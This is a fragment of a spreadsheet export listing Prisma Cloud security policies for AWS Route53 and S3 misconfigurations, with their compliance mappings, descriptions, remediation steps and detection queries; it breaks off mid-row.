NIST 800-53 Rev 5, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST SP 800-171 Revision 2, CHC HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, HITRUST CSF v.9.6.0, Microsoft Cloud Security Benchmark v1, CDC NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2066" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2066" s="2" t="inlineStr"/>
      <c r="D2066" t="inlineStr"/>
      <c r="E2066" t="inlineStr"/>
      <c r="F2066" t="inlineStr"/>
      <c r="G2066" t="b">
        <v>1</v>
      </c>
      <c r="H20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66" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2066" t="inlineStr">
        <is>
          <t>aws-route53</t>
        </is>
      </c>
      <c r="K2066" t="inlineStr">
        <is>
          <t>AWS Route53 Public Zone with Private Records</t>
        </is>
      </c>
      <c r="L2066" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2066" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2066" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2066" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2066" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2066" t="inlineStr">
        <is>
          <t>Guidelines for Gateways</t>
        </is>
      </c>
      <c r="R2066" t="inlineStr">
        <is>
          <t>ISM-1783</t>
        </is>
      </c>
      <c r="S2066" t="inlineStr"/>
      <c r="T2066" t="b">
        <v>0</v>
      </c>
      <c r="U2066" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2066" t="inlineStr">
        <is>
          <t>aws-route53-list-hosted-zones</t>
        </is>
      </c>
      <c r="W2066" t="inlineStr">
        <is>
          <t>A hosted zone is a container for records (An object in a hosted zone that you use to define how you want to route traffic for the domain or a subdomain), which include information about how you want to route traffic for a domain (such as example.com) and all of its subdomains (such as www.example.com, retail.example.com, and seattle.accounting.example.com). A hosted zone has the same name as the corresponding domain. A public hosted zone is a container that holds information about how you want to route traffic on the internet for a specific domain.It is best practice to avoid AWS Route 53 Public Hosted Zones containing DNS records for private IPs or resources within your AWS account to overcome information leakage of your internal network and resources.</t>
        </is>
      </c>
      <c r="X2066" t="inlineStr">
        <is>
          <t>You can not convert a public hosted zone into a private hosted zone. So, it is recommended to create and configure a Private Hosted Zone to manage private IPs within your Virtual Private Cloud (VPC) as Amazon Route 53 service will only return your private DNS records when queried from within the associated VPC, and delete the associated public hosted zone once the Private hosted zone is configured with all the records.
To create a private hosted zone using the Route 53 console:
1.For each VPC that you want to associate with the Route 53 hosted zone, change the following VPC settings to true:
 'enableDnsHostnames'
 'enableDnsSupport'
For more information, see Updating DNS Support (http://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-dns.html#vpc-dns-updating) for Your VPC in the Amazon VPC User Guide.
2. Sign in to the AWS console
3. Go to Route 53 console
4. If you are new to Route 53, choose Get Started Now under DNS Management. If you are already using Route 53, choose Hosted Zones in the navigation pane.
5. Choose 'Create Hosted Zone'
6. In the Create Private Hosted Zone pane, enter a domain name and, optionally, a comment.
For information about how to specify characters other than a-z, 0-9, and - (hyphen) and how to specify internationalized domain names, see DNS Domain Name Format (https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/DomainNameFormat.html).
7. In the Type list, choose Private Hosted Zone for Amazon VPC
8. In the VPC ID list, choose the VPC that you want to associate with the hosted zone. If you want to associate more than one VPC with the hosted zone, you can add VPCs after you create the hosted zone.
Note: If the console displays the following message, you are trying to associate a VPC with this hosted zone that has already been associated with another hosted zone that has an overlapping namespace, such as example.com and retail.example.com:
'A conflicting domain is already associated with the given VPC or Delegation Set.'
9. Choose Create
10. To associate more VPCs with the new hosted zone, perform the following steps:
 a. Choose Back to Hosted Zones.
 b. Choose the radio button for the hosted zone.
 c. In the right pane, in VPC ID, choose another VPC that you want to associate with the hosted zone.
 d. Choose Associate New VPC.
 e. Repeat steps c and d until you have associated all of the VPCs that you want to with the hosted zone.
For More Information : https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/hosted-zone-private-creating.html
To delete a public hosted zone using the Route 53 console:
1. Sign into the AWS console
2. Go Route53 console
3. Confirm that the hosted zone that you want to delete contains only an NS and an SOA record. If it contains additional records, delete them:
 a. Choose the name of the hosted zone that you want to delete.
 b. On the Record Sets page, if the list of records includes any records for which the value of the Type column is something other than NS or SOA, choose the row, and choose Delete Record Set. To select multiple, consecutive records, choose the first row, press and hold the Shift key, and choose the last row. To select multiple, non-consecutive records, choose the first row, press and hold the Ctrl key, and choose the remaining rows. Note: If you created any NS records for subdomains in the hosted zone, delete those records, too.
 c. Choose Back to Hosted Zones
4. On the Hosted Zones page, choose the row for the hosted zone that you want to delete.
5. Choose Delete Hosted Zone.
6. Choose OK to confirm.
7. If you want to make the domain unavailable on the internet, we recommend that you transfer DNS service to a free DNS service and then delete the Route 53 hosted zone. This prevents future DNS queries from possibly being misrouted. If the domain is registered with Route 53, see Adding or Changing Name Servers and Glue Records for a Domain (https://docs.aws.amazon.com/Route53/latest DeveloperGuide/domain-name-servers-glue-records.html) for information about how to replace Route 53 nameservers with name servers for the new DNS service. If the domain is registered with another registrar, use the method provided by the registrar to change name servers for the domain.
For More Information : https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/DeleteHostedZone.html</t>
        </is>
      </c>
      <c r="Y2066" t="inlineStr"/>
      <c r="Z2066" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-route53-list-hosted-zones' AND json.rule =  'hostedZone.config.privateZone is false and resourceRecordSet[*].type any equal A and (resourceRecordSet[*].resourceRecords[*].value any start with 10. or resourceRecordSet[*].resourceRecords[*].value any start with _IPAddress.inRange("172.%d",16,31) or resourceRecordSet[*].resourceRecords[*].value any start with 192.168.)'</t>
        </is>
      </c>
      <c r="AA2066" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2066" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2066" t="inlineStr">
        <is>
          <t>PC-AWS-R53-341</t>
        </is>
      </c>
      <c r="AD2066" t="b">
        <v>1</v>
      </c>
      <c r="AE2066" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2066" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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66" t="inlineStr">
        <is>
          <t>9a2dfca7-7d32-4007-b249-c1efd6dee74b</t>
        </is>
      </c>
      <c r="AI2066" t="inlineStr">
        <is>
          <t>196dfd2b-2096-45cb-b513-0669ec4d9f08</t>
        </is>
      </c>
      <c r="AJ2066" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2066" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2067">
      <c r="A2067" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2, TX-RAMP Level 1, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2067" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2067" s="2" t="inlineStr"/>
      <c r="D2067" t="inlineStr"/>
      <c r="E2067" t="inlineStr"/>
      <c r="F2067" t="inlineStr"/>
      <c r="G2067" t="b">
        <v>1</v>
      </c>
      <c r="H20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67" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2067" t="inlineStr">
        <is>
          <t>aws-route53</t>
        </is>
      </c>
      <c r="K2067" t="inlineStr">
        <is>
          <t>AWS Route53 public Hosted Zone query logging is not enabled</t>
        </is>
      </c>
      <c r="L2067" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2067" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2067" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2067" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2067" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2067" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2067" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2067" t="inlineStr"/>
      <c r="T2067" t="b">
        <v>0</v>
      </c>
      <c r="U2067" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2067" t="inlineStr">
        <is>
          <t>aws-route53-list-hosted-zones</t>
        </is>
      </c>
      <c r="W2067" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Route53 public hosted zones DNS query logging is not enabled.
Enabling DNS query logging for an AWS Route 53 hosted zone enhances DNS security and compliance by providing visibility into DNS queries. When enabled, Route 53 sends these log files to Amazon CloudWatch Logs. Disabling DNS query logging for AWS Route 53 limits visibility into DNS traffic, hampering anomaly detection, compliance efforts, and effective incident response.
It is recommended to enable logging for all public hosted zones to enhance the visibility and compliance requirements.</t>
        </is>
      </c>
      <c r="X2067" t="inlineStr">
        <is>
          <t>To configure logging for DNS queries for the Hosted zone, perform the following actions:
1. Sign in to the AWS Management Console and open the Route 53 console
2. In the navigation pane, choose 'Hosted zones'
3. Choose the hosted zone that is reported
4. In the Hosted zone details pane, choose 'Configure query logging'
5. Choose an existing log group or create a new log group from the 'Log group' section drop-down
6. Choose 'Permissions - optional' to see a table that shows whether the resource policy matches the CloudWatch log group,  and whether Route 53 has permission to publish logs to CloudWatch
7. Choose 'Create'</t>
        </is>
      </c>
      <c r="Y2067" t="inlineStr"/>
      <c r="Z2067" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-route53-list-hosted-zones' AND json.rule = hostedZone.config.privateZone is false as X; config from cloud.resource where api.name = 'aws-route53-query-logging-config' as Y; filter ' not ($.X.hostedZone.id equals $.Y.HostedZoneId) ' ; show X;</t>
        </is>
      </c>
      <c r="AA2067" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2067" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2067" t="inlineStr">
        <is>
          <t>PC-AWS-R53-1237</t>
        </is>
      </c>
      <c r="AD2067" t="b">
        <v>1</v>
      </c>
      <c r="AE2067" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2067" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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67" t="inlineStr">
        <is>
          <t>e51b9170-5913-4249-aa14-197a776ee28a</t>
        </is>
      </c>
      <c r="AI2067" t="inlineStr">
        <is>
          <t>d628b515-4f32-4cb5-9e60-8a7609e9a3c4</t>
        </is>
      </c>
      <c r="AJ2067" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2067" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2068">
      <c r="A2068" t="inlineStr"/>
      <c r="B2068" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2068" s="2" t="inlineStr"/>
      <c r="D2068" t="inlineStr"/>
      <c r="E2068" t="inlineStr"/>
      <c r="F2068" t="inlineStr"/>
      <c r="G2068" t="b">
        <v>0</v>
      </c>
      <c r="H20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68" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2068" t="inlineStr">
        <is>
          <t>aws-s3</t>
        </is>
      </c>
      <c r="K2068" t="inlineStr">
        <is>
          <t>test-policy-4-matias</t>
        </is>
      </c>
      <c r="L2068" t="inlineStr"/>
      <c r="M2068" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2068" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2068" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2068" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2068" t="inlineStr"/>
      <c r="R2068" t="inlineStr"/>
      <c r="S2068" t="inlineStr"/>
      <c r="T2068" t="b">
        <v>0</v>
      </c>
      <c r="U2068" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2068" t="inlineStr">
        <is>
          <t>aws-s3-access-point</t>
        </is>
      </c>
      <c r="W2068" t="inlineStr"/>
      <c r="X2068" t="inlineStr"/>
      <c r="Y2068" t="inlineStr"/>
      <c r="Z2068" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3-access-point' AND json.rule = networkOrigin equal ignore case internet and (publicAccessBlockConfiguration does not exist or (publicAccessBlockConfiguration.blockPublicAcls is false and publicAccessBlockConfiguration.ignorePublicAcls is false and publicAccessBlockConfiguration.blockPublicPolicy is false and publicAccessBlockConfiguration.restrictPublicBuckets is false))</t>
        </is>
      </c>
      <c r="AA2068" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2068" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2068" t="inlineStr"/>
      <c r="AD2068" t="b">
        <v>0</v>
      </c>
      <c r="AE2068" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2068" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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68" t="inlineStr">
        <is>
          <t>6442d0fc-3f88-468d-a10d-016fdc9f9949</t>
        </is>
      </c>
      <c r="AI2068" t="inlineStr">
        <is>
          <t>2071f402-60ac-4a97-9e74-0bf95081baf7</t>
        </is>
      </c>
      <c r="AJ2068" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2068" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2069">
      <c r="A2069" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2069" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2069" s="2" t="inlineStr"/>
      <c r="D2069" t="inlineStr"/>
      <c r="E2069" t="inlineStr"/>
      <c r="F2069" t="inlineStr"/>
      <c r="G2069" t="b">
        <v>1</v>
      </c>
      <c r="H20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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2069" t="inlineStr">
        <is>
          <t>aws-s3</t>
        </is>
      </c>
      <c r="K2069" t="inlineStr">
        <is>
          <t>AWS S3 access point Block public access setting disabled</t>
        </is>
      </c>
      <c r="L2069" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2069" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2069" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2069" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2069" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2069" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2069" t="inlineStr">
        <is>
          <t>SC-07-03 : Boundary Protection | Access Points</t>
        </is>
      </c>
      <c r="S2069" t="inlineStr"/>
      <c r="T2069" t="b">
        <v>0</v>
      </c>
      <c r="U2069" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2069" t="inlineStr">
        <is>
          <t>aws-s3-access-point</t>
        </is>
      </c>
      <c r="W2069" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 access points with the block public access setting disabled.
AWS S3 Access Point simplifies managing data access by creating unique access control policies for specific applications or users within a S3 bucket. The Amazon S3 Block Public Access feature manages access at the account, bucket, and access point levels. Each level's settings can be configured independently but cannot override more restrictive settings at higher levels. Instead, access point settings complement those at the account and bucket levels.
It is recommended to enable the Block public access setting on a S3 access point unless intended for public exposure.</t>
        </is>
      </c>
      <c r="X2069" t="inlineStr">
        <is>
          <t>Block public access setting can be enabled at creation time only:
1. Sign in to the AWS Management Console and navigate to the Amazon S3 dashboard
2. In the left navigation pane, choose 'Access Points'
3. On the Access Points page, choose 'Create access point'
4. In the Access point name field, enter the name of the access point
5. Under 'Block Public Access settings for this Access Point', make sure to select 'Block all public access'
6. Click on 'Create access point'.</t>
        </is>
      </c>
      <c r="Y2069" t="inlineStr"/>
      <c r="Z2069" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3-access-point' AND json.rule = networkOrigin equal ignore case internet and (publicAccessBlockConfiguration does not exist or (publicAccessBlockConfiguration.blockPublicAcls is false and publicAccessBlockConfiguration.ignorePublicAcls is false and publicAccessBlockConfiguration.blockPublicPolicy is false and publicAccessBlockConfiguration.restrictPublicBuckets is false))</t>
        </is>
      </c>
      <c r="AA2069" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2069" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2069" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1263</t>
        </is>
      </c>
      <c r="AD2069" t="b">
        <v>1</v>
      </c>
      <c r="AE2069" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2069" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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69" t="inlineStr">
        <is>
          <t>b1b718d8-e62e-497d-80f2-2baa66a4f8bd</t>
        </is>
      </c>
      <c r="AI2069" t="inlineStr">
        <is>
          <t>2071f402-60ac-4a97-9e74-0bf95081baf7</t>
        </is>
      </c>
      <c r="AJ2069" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2069" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2070">
      <c r="A2070" t="inlineStr"/>
      <c r="B2070" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2070" s="2" t="inlineStr"/>
      <c r="D2070" t="n">
        <v>0</v>
      </c>
      <c r="E2070" t="n">
        <v>7</v>
      </c>
      <c r="F2070" t="n">
        <v>0</v>
      </c>
      <c r="G2070" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2070" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2070" t="inlineStr">
        <is>
          <t>Elevance Test Config</t>
        </is>
      </c>
      <c r="L2070" t="inlineStr"/>
      <c r="M2070" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2070" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2070" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2070" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2070" t="inlineStr"/>
      <c r="R2070" t="inlineStr"/>
      <c r="S2070" t="inlineStr"/>
      <c r="T2070" t="b">
        <v>0</v>
      </c>
      <c r="U2070" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2070" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2070" t="inlineStr">
        <is>
          <t>public s3 bucket</t>
        </is>
      </c>
      <c r="X2070" t="inlineStr"/>
      <c r="Y2070" t="inlineStr"/>
      <c r="Z2070" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule =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and acl.grantsAsList[?any(grantee equals AllUsers and permission is member of (ReadAcp,Read,FullControl))] exists)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and (policy.Statement[?any(Effect equals Allow and (Principal equals * or Principal.AWS equals *) and (Action contains s3:* or Action contains s3:Get or Action contains s3:List) and (Condition does not exist))] exists))) and websiteConfiguration does not exist</t>
        </is>
      </c>
      <c r="AA2070" t="inlineStr">
        <is>
          <t>Bishvesh Pachauli</t>
        </is>
      </c>
      <c r="AB2070" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2070" t="inlineStr"/>
      <c r="AD2070" t="b">
        <v>0</v>
      </c>
      <c r="AE2070" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2070" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>6096161a-41b1-4ce0-a05a-466ef0664911</t>
        </is>
      </c>
      <c r="AI2070" t="inlineStr">
        <is>
          <t>c1a1dcbf-b2d9-40c2-a1ac-c7eb2c562447</t>
        </is>
      </c>
      <c r="AJ2070" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2070" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2071">
      <c r="A2071" t="inlineStr"/>
      <c r="B2071" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2071" s="2" t="inlineStr"/>
      <c r="D2071" t="inlineStr"/>
      <c r="E2071" t="inlineStr"/>
      <c r="F2071" t="inlineStr"/>
      <c r="G2071" t="b">
        <v>0</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2071" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2071" t="inlineStr">
        <is>
          <t>tets100</t>
        </is>
      </c>
      <c r="L2071" t="inlineStr"/>
      <c r="M2071" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2071" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2071" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2071" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2071" t="inlineStr"/>
      <c r="R2071" t="inlineStr"/>
      <c r="S2071" t="inlineStr"/>
      <c r="T2071" t="b">
        <v>0</v>
      </c>
      <c r="U2071" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2071" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2071" t="inlineStr"/>
      <c r="X2071" t="inlineStr"/>
      <c r="Y2071" t="inlineStr"/>
      <c r="Z2071" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.accountgroup = 'Default Account Group' AND cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = "((((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) or policyStatus.isPublic is true) and publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist) or ((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) and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as X; config from cloud.resource where api.name = 'aws-cloudtrail-describe-trails' as Y; filter'$.X.bucketName equals $.Y.s3BucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2071" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2071" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2071" t="inlineStr"/>
      <c r="AD2071" t="b">
        <v>0</v>
      </c>
      <c r="AE2071" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2071" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>a2858955-3fc2-471e-9378-eabd4f1dfa24</t>
        </is>
      </c>
      <c r="AI2071" t="inlineStr">
        <is>
          <t>ff071c2b-b6fd-457f-b8d4-5868f17a1a61</t>
        </is>
      </c>
      <c r="AJ2071" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2071" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2072">
      <c r="A2072" t="inlineStr">
        <is>
          <t>Demo_Daryl ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2072" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2072" s="2" t="inlineStr"/>
      <c r="D2072" t="inlineStr"/>
      <c r="E2072" t="inlineStr"/>
      <c r="F2072" t="inlineStr"/>
      <c r="G2072" t="b">
        <v>0</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2072" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2072" t="inlineStr">
        <is>
          <t>s3 bucket is not encrypted</t>
        </is>
      </c>
      <c r="L2072" t="inlineStr"/>
      <c r="M2072" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2072" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2072" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2072" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2072" t="inlineStr">
        <is>
          <t>Demo_ Daryl TEST</t>
        </is>
      </c>
      <c r="R2072" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="S2072" t="inlineStr">
        <is>
          <t>PCI DSS v3.2,CIS</t>
        </is>
      </c>
      <c r="T2072" t="b">
        <v>0</v>
      </c>
      <c r="U2072" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2072" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2072" t="inlineStr">
        <is>
          <t>s3 bucket is not encrypted</t>
        </is>
      </c>
      <c r="X2072" t="inlineStr"/>
      <c r="Y2072" t="inlineStr"/>
      <c r="Z2072" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.service = 'Amazon S3' AND finding.type = 'AWS Inspector Security Best Practices' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = denyUnencryptedUploadsPolicies[*] exists</t>
        </is>
      </c>
      <c r="AA2072" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2072" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2072" t="inlineStr"/>
      <c r="AD2072" t="b">
        <v>0</v>
      </c>
      <c r="AE2072" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2072" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>82d506f4-074a-430c-9b27-0c4b3d39ad02</t>
        </is>
      </c>
      <c r="AI2072" t="inlineStr">
        <is>
          <t>563268a4-a7f1-487f-a557-e7957e110017</t>
        </is>
      </c>
      <c r="AJ2072" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2072" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2073">
      <c r="A2073" t="inlineStr"/>
      <c r="B2073" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2073" s="2" t="inlineStr"/>
      <c r="D2073" t="inlineStr"/>
      <c r="E2073" t="inlineStr"/>
      <c r="F2073" t="inlineStr"/>
      <c r="G2073" t="b">
        <v>0</v>
      </c>
      <c r="H2073" t="inlineStr">
        <is>
          <t>BG-AH-Email-Test, BPtestTag, Default Alert Rule, JEC-Find all Security Groups that opens port 22 to the internet (and are attached to an EC2 instance)., New Azure Subscription Created, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Pramm-s3-bucket-foo-alert-rule, Ranti-Jira-Alert-rule, anomalies-avega, ar-vstoyko, cj_test_tagBased, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I2073" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2073" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2073" t="inlineStr">
        <is>
          <t>Pramm-s3-bucket-foo</t>
        </is>
      </c>
      <c r="L2073" t="inlineStr"/>
      <c r="M2073" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2073" t="inlineStr">
